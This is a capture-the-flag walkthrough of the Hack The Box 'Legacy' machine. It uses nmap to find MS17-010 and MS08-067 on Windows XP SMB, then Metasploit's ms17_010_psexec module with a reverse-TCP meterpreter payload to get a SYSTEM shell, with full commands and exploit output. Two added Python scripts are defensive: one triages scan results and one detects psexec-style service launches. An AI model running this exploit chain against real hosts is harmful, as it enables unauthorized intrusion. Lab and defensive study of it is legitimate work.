【HackTheBox】Legacy - Walkthrough -

This article covers Legacy, one of the Retired Machines offered by Hack The Box.

For details on Hack The Box itself, see also "Kali Linux tuning for enjoying Hack The Box".

Machine details


Executive summary


Tools

  • nmap
  • msfconsole

Detailed procedure



    Network service scan

    nmap

    Add the IP address 10.10.10.4 to /etc/hosts as legacy.htb. Then run a port scan with nmap. The purpose of each option is as follows.

    -Pn: skip the host-discovery ping that normally precedes the scan and treat the host as up.
    -T4: set the timing template. Here "aggressive (4)" is used, which caps the dynamic scan delay for TCP ports at 10 ms.
    -A: enable OS detection and version detection.
    -v: verbose mode; print details of the scan as it runs.

    Nmap Network Scanning, https://nmap.org/man/ja/man-briefoptions.html
    kali@kali:~$ nmap -Pn -T4 -A -v legacy.htb
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 03:26 EDT
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 03:26
    Completed NSE at 03:26, 0.00s elapsed
    Initiating NSE at 03:26
    Completed NSE at 03:26, 0.00s elapsed
    Initiating NSE at 03:26
    Completed NSE at 03:26, 0.00s elapsed
    Initiating Connect Scan at 03:26
    Scanning legacy.htb (10.10.10.4) [1000 ports]
    Discovered open port 139/tcp on 10.10.10.4
    Discovered open port 445/tcp on 10.10.10.4
    Completed Connect Scan at 03:27, 27.82s elapsed (1000 total ports)
    Initiating Service scan at 03:27
    Scanning 2 services on legacy.htb (10.10.10.4)
    Completed Service scan at 03:27, 6.84s elapsed (2 services on 1 host)
    NSE: Script scanning 10.10.10.4.
    Initiating NSE at 03:27
    Completed NSE at 03:28, 51.87s elapsed
    Initiating NSE at 03:28
    Completed NSE at 03:28, 0.00s elapsed
    Initiating NSE at 03:28
    Completed NSE at 03:28, 0.00s elapsed
    Nmap scan report for legacy.htb (10.10.10.4)
    Host is up (0.20s latency).
    Not shown: 997 filtered ports
    PORT     STATE  SERVICE       VERSION
    139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open   microsoft-ds  Windows XP microsoft-ds
    3389/tcp closed ms-wbt-server
    Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
    
    Host script results:
    |_clock-skew: mean: 5d00h29m24s, deviation: 2h07m15s, median: 4d22h59m25s
    | nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:7e:96 (VMware)
    | Names:
    |   LEGACY<00>           Flags: <unique><active>
    |   HTB<00>              Flags: <group><active>
    |   LEGACY<20>           Flags: <unique><active>
    |   HTB<1e>              Flags: <group><active>
    |   HTB<1d>              Flags: <unique><active>
    |_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
    | smb-os-discovery: 
    |   OS: Windows XP (Windows 2000 LAN Manager)
    |   OS CPE: cpe:/o:microsoft:windows_xp::-
    |   Computer name: legacy
    |   NetBIOS computer name: LEGACY\x00
    |   Workgroup: HTB\x00
    |_  System time: 2020-09-02T12:26:41+03:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    |_smb2-time: Protocol negotiation failed (SMB2)
    
    NSE: Script Post-scanning.
    Initiating NSE at 03:28
    Completed NSE at 03:28, 0.00s elapsed
    Initiating NSE at 03:28
    Completed NSE at 03:28, 0.00s elapsed
    Initiating NSE at 03:28
    Completed NSE at 03:28, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 87.21 seconds
    

    The services running on the target are now known. The ones of particular interest are:

    Port      Service        Version
    139/tcp   netbios-ssn    Microsoft Windows netbios-ssn
    445/tcp   microsoft-ds   Windows XP microsoft-ds


    SMB service scan

    Let's enumerate the details of the SMB service. Run the rpcclient command. Unfortunately, anonymous connections do not appear to be supported (the connection times out with NT_STATUS_IO_TIMEOUT).
    kali@kali:~$ rpcclient -U "" legacy.htb
    Enter WORKGROUP\'s password: 
    Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT
    
    With nmap, the Nmap Scripting Engine (NSE) lets you write scripts in the Lua language that automate network tasks.
    This time we pass the --script option (nmap also accepts the single-dash spelling used below) to run every SMB vulnerability script, smb-vuln*, at once against legacy.htb.
    kali@kali:~$ nmap -Pn -v -script smb-vuln* -p 139,445 10.10.10.4
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 03:48 EDT
    NSE: Loaded 11 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 03:48
    Completed NSE at 03:48, 0.00s elapsed
    Initiating Connect Scan at 03:48
    Scanning legacy.htb (10.10.10.4) [2 ports]
    Discovered open port 139/tcp on 10.10.10.4
    Discovered open port 445/tcp on 10.10.10.4
    Completed Connect Scan at 03:48, 0.28s elapsed (2 total ports)
    NSE: Script scanning 10.10.10.4.
    Initiating NSE at 03:48
    Completed NSE at 03:48, 6.76s elapsed
    Nmap scan report for legacy.htb (10.10.10.4)
    Host is up (0.28s latency).
    
    PORT    STATE SERVICE
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-vuln-ms08-067: 
    |   VULNERABLE:
    |   Microsoft Windows system vulnerable to remote code execution (MS08-067)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2008-4250
    |           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
    |           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
    |           code via a crafted RPC request that triggers the overflow during path canonicalization.
    |           
    |     Disclosure date: 2008-10-23
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
    |_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
    | smb-vuln-ms17-010: 
    |   VULNERABLE:
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2017-0143
    |     Risk factor: HIGH
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    |        servers (ms17-010).
    |           
    |     Disclosure date: 2017-03-14
    |     References:
    |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
    
    NSE: Script Post-scanning.
    Initiating NSE at 03:48
    Completed NSE at 03:48, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Nmap done: 1 IP address (1 host up) scanned in 7.31 seconds
    

    The result confirms that the host is vulnerable to MS17-010 (CVE-2017-0143); the same scan also reports MS08-067 (CVE-2008-4250).
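
Reading the two reports above by eye works for one host, but a defender scanning their own SMB estate wants the same verdicts pulled out automatically. The following script is an added example for this walkthrough, not code from the original page or from Nmap: it parses Nmap's normal-format output (the port table and the "Host script results" block), and turns the OS, smb-security-mode and smb-vuln-* lines into a short list of findings, including the case where a check crashed and therefore proves nothing. The two sample reports are abridged copies of the scans shown above; severities and the Finding structure are this example's own choices.

```python
"""Triage helper for Nmap normal-format output (added example for this
walkthrough; not from the original page or from Nmap).  It pulls open ports,
the smb-security-mode flags and the smb-vuln-* verdicts out of the text Nmap
prints.  The two sample reports are abridged copies of the scans shown above."""
import re
from dataclasses import dataclass

SERVICE_SCAN = """\
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server

Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
"""

VULN_SCAN = """\
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")
CVE_RE = re.compile(r"CVE:(CVE-\d{4}-\d{4,})")

@dataclass
class Finding:
    check: str      # Nmap script (or table) that produced it
    severity: str   # critical / high / medium / info
    detail: str

def parse_ports(text):
    """(port, proto, state, service, version) for every port-table line."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            ports.append((int(port), proto, state, service, (version or "").strip()))
    return ports

def parse_host_scripts(text):
    """Group NSE lines into {script: [body lines]}.  A header is '| name: value' or
    '|_name: value'; body lines have two or more spaces after the bar.  '|_' only
    marks the last line of a block, so it is dropped before the indent is measured."""
    scripts, current = {}, None
    for line in text.splitlines():
        if not line.startswith("|"):
            current = None
            continue
        rest = line[1:]
        if rest.startswith("_"):
            rest = rest[1:]
        indent = len(rest) - len(rest.lstrip(" "))
        if indent <= 1:
            name, _, value = rest.strip().partition(":")
            current = name
            scripts[current] = [value.strip()] if value.strip() else []
        elif current is not None:
            scripts[current].append(rest.strip())
    return scripts

def triage(text):
    """Turn one Nmap report into an ordered list of defender-side findings."""
    findings, scripts = [], parse_host_scripts(text)
    for line in scripts.get("smb-os-discovery", []):
        if line.startswith("OS:") and "Windows XP" in line:
            findings.append(Finding("smb-os-discovery", "high",
                                    "end-of-life OS, no security updates: " + line[3:].strip()))
    for line in scripts.get("smb-security-mode", []):
        if line.startswith("message_signing:") and "disabled" in line:
            findings.append(Finding("smb-security-mode", "medium", line))
    smb2 = scripts.get("smb2-time", [])
    if smb2 and "negotiation failed" in smb2[0]:
        findings.append(Finding("smb2-time", "medium", "SMB2 not negotiated; host is probably SMB1-only"))
    for name, lines in scripts.items():
        if not name.startswith("smb-vuln-"):
            continue
        if any(ln.startswith("State:") and "VULNERABLE" in ln for ln in lines):
            cves = [m.group(1) for ln in lines if (m := CVE_RE.search(ln))]
            findings.append(Finding(name, "critical", ", ".join(cves) or "no CVE listed"))
        elif lines and lines[0].startswith("ERROR"):
            # the check crashed: the host is unverified, not clean
            findings.append(Finding(name, "info", "check did not run: " + lines[0]))
    return findings

if __name__ == "__main__":
    for report in (SERVICE_SCAN, VULN_SCAN):
        for f in triage(report):
            print(f"[{f.severity:8}] {f.check}: {f.detail}")
```

On the service scan the script reports the end-of-life OS, the disabled SMB signing and the failed SMB2 negotiation; on the vulnerability scan it reports MS08-067 and MS17-010 as critical and keeps the ms10-061 script error as an "info" item, because a check that did not run must not be read as a pass. Nmap's -oX output would make the parsing more robust for real fleet use, but the normal format is what the page shows.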

    Using Metasploit

    Searching for an attack module

    Search the Metasploit Framework for a module matching MS17-010 (CVE-2017-0143).
    kali@kali:~$ msfconsole
    msf5 > search cve-2017-0143
    
    Matching Modules
    ================
    
       #  Name                                           Disclosure Date  Rank     Check  Description
       -  ----                                           ---------------  ----     -----  -----------
       0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
       1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
       2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
       3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
       4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
       5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
    
    
    Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce
    
    It looks like 4 exploit/windows/smb/ms17_010_psexec can be used.

    Configuring the attack module

    Declare the module found above with the use command.
    If the declaration succeeds, the prompt changes to msf5 exploit(windows/smb/ms17_010_psexec) >.
    msf5 > use exploit/windows/smb/ms17_010_psexec 
    [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/ms17_010_psexec) > 
    

    Check the items the module needs with the options command.
    Items whose [Required] column reads [yes] must be set.
    Here those are [DBGTRACE], [LEAKATTEMPTS], [NAMED_PIPES], [RHOSTS], [RPORT] and [SHARE].
    However, every item other than [RHOSTS] already has a value, so setting [RHOSTS] alone completes the configuration.
    msf5 exploit(windows/smb/ms17_010_psexec) > options
    
    Module options (exploit/windows/smb/ms17_010_psexec):
    
       Name                  Current Setting                                                 Required  Description
       ----                  ---------------                                                 --------  -----------
       DBGTRACE              false                                                           yes       Show extra debug trace info
       LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
       NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
       NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
       RHOSTS                                                                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT                 445                                                             yes       The Target port (TCP)
       SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
       SERVICE_DISPLAY_NAME                                                                  no        The service display name
       SERVICE_NAME                                                                          no        The service name
       SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
       SMBDomain             .                                                               no        The Windows domain to use for authentication
       SMBPass                                                                               no        The password for the specified username
       SMBUser                                                                               no        The username to authenticate as
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     10.10.14.5       yes       The listen address (an interface may be specified)
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    msf5 exploit(windows/smb/ms17_010_psexec) >
    

    The value to set in [RHOSTS] is "The target host(s)",
    that is, the IP address of legacy.htb. Use the set command to assign a value:
    set <option name> <value>
    

    In this case it can be set with the following command:
    msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
    rhost => 10.10.10.4
    msf5 exploit(windows/smb/ms17_010_psexec) > 
    

    Running the attack module

    Run the exploit code with the exploit command.
    msf5 exploit(windows/smb/ms17_010_psexec) > exploit
    
    [*] Started reverse TCP handler on 10.10.14.5:4444 
    [*] 10.10.10.4:445 - Target OS: Windows 5.1
    [*] 10.10.10.4:445 - Filling barrel with fish... done
    [*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
    [*] 10.10.10.4:445 -    [*] Preparing dynamite...
    [*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
    [*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
    [*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
    [*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
    [*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x821167c0
    [*] 10.10.10.4:445 - Built a write-what-where primitive...
    [+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
    [*] 10.10.10.4:445 - Selecting native target
    [*] 10.10.10.4:445 - Uploading payload... CWqoNatO.exe
    [*] 10.10.10.4:445 - Created \CWqoNatO.exe...
    [+] 10.10.10.4:445 - Service started successfully...
    [*] Sending stage (176195 bytes) to 10.10.10.4
    [*] 10.10.10.4:445 - Deleting \CWqoNatO.exe...
    [*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.4:1032) at 2020-08-28 04:04:05 -0400
    
    The meterpreter prompt appears. Checking the privilege level with the getuid command shows that NT AUTHORITY\SYSTEM privileges were obtained.
    With this, the legacy.htb machine is fully compromised.
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
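
The exploit log above shows what this technique leaves behind on the target: a binary with a random name (CWqoNatO.exe) is written through the ADMIN$ share, registered and started as a service running as SYSTEM, and deleted a few seconds later. The following script is an added example for this walkthrough, not code from the original page or from Metasploit, and it sketches how a defender would spot that trace in host telemetry. The event records are constructed, and their field names (kind, service_name, image_path, path) are this example's own schema standing in for whatever the collector emits; on Windows the service installation is normally System log event 7045 and the deletion comes from file auditing. The three indicators and the "two or more" alert threshold are likewise assumptions chosen for illustration.

```python
"""Detection sketch for the host-side trace of a psexec-style service launch
(added example; not part of the walkthrough).  Indicators: a random-looking
service name, a binary placed directly in the Windows directory (what ADMIN$
maps to), and deletion of that binary shortly after the service was installed.
The EVENTS list is constructed and uses this example's own field names."""
import ntpath
from datetime import datetime

# Constructed records, loosely following the timeline of the session above.
EVENTS = [
    {"ts": "2020-08-28T04:00:00", "kind": "service_installed", "host": "LEGACY",
     "service_name": "Spooler", "image_path": r"C:\WINDOWS\system32\spoolsv.exe",
     "account": "LocalSystem"},
    {"ts": "2020-08-28T04:03:58", "kind": "service_installed", "host": "LEGACY",
     "service_name": "CWqoNatO", "image_path": r"%SYSTEMROOT%\CWqoNatO.exe",
     "account": "LocalSystem"},
    {"ts": "2020-08-28T04:04:05", "kind": "file_deleted", "host": "LEGACY",
     "path": r"C:\WINDOWS\CWqoNatO.exe"},
]

def looks_random(name):
    """Weak indicator: all letters, 6-12 long, and the letter case flips at
    least three times ('CWqoNatO' flips four times, 'Spooler' once).  It only
    counts together with the other indicators, never on its own."""
    if not (6 <= len(name) <= 12 and name.isalpha()):
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips >= 3

def in_windows_root(path):
    """True when the binary sits directly in the Windows directory (ADMIN$ root)
    instead of system32 or a program folder."""
    return ntpath.dirname(path).lower() in {"%systemroot%", r"c:\windows", ""}

def detect(events, max_lifetime_s=60):
    """Score every service install; two or more indicators raise an alert."""
    deletes = [e for e in events if e["kind"] == "file_deleted"]
    alerts = []
    for e in (x for x in events if x["kind"] == "service_installed"):
        reasons = []
        if looks_random(e["service_name"]):
            reasons.append("random-looking service name")
        if in_windows_root(e["image_path"]):
            reasons.append("binary placed directly in the Windows directory")
        t0 = datetime.fromisoformat(e["ts"])
        base = ntpath.basename(e["image_path"]).lower()
        for d in deletes:
            age = (datetime.fromisoformat(d["ts"]) - t0).total_seconds()
            if ntpath.basename(d["path"]).lower() == base and 0 <= age <= max_lifetime_s:
                reasons.append(f"binary deleted {age:.0f}s after the service was installed")
                break
        if len(reasons) >= 2:
            alerts.append({"host": e["host"], "service": e["service_name"],
                           "image": e["image_path"], "score": len(reasons),
                           "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"{a['host']}: service {a['service']} ({a['image']}) score={a['score']}")
        for r in a["reasons"]:
            print("   -", r)
```

Run against the constructed records, the script raises one alert with all three indicators for CWqoNatO and none for the Spooler install, which has a normal name, lives in system32 and is never deleted. The more durable mitigations for this machine are the ones the scans already pointed at: the host runs an end-of-life OS without the MS17-010 and MS08-067 patches and exposes SMB1 without signing, so detection here is a backstop, not a substitute for patching and disabling SMB1.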
    



    References

    Walkthroughs

  • https://0xdf.gitlab.io/2019/02/21/htb-legacy.html
  • https://medium.com/@ranakhalil101/… (Legacy write-up)
  • @산포_시호, "【Hack the Box write-up】Legacy"
  • @유키츠카이47, "Hack The Box [Legacy] -Writeup-"

    Other

  • Cybrary whitepaper "Guerrilla Red Team: Decentralize the Adversary", Christopher Cottrell, 2020/8/3
  • "DEF CON 28: Red Team Village: Building a Guerrilla Red Team that Kicks the Adversary"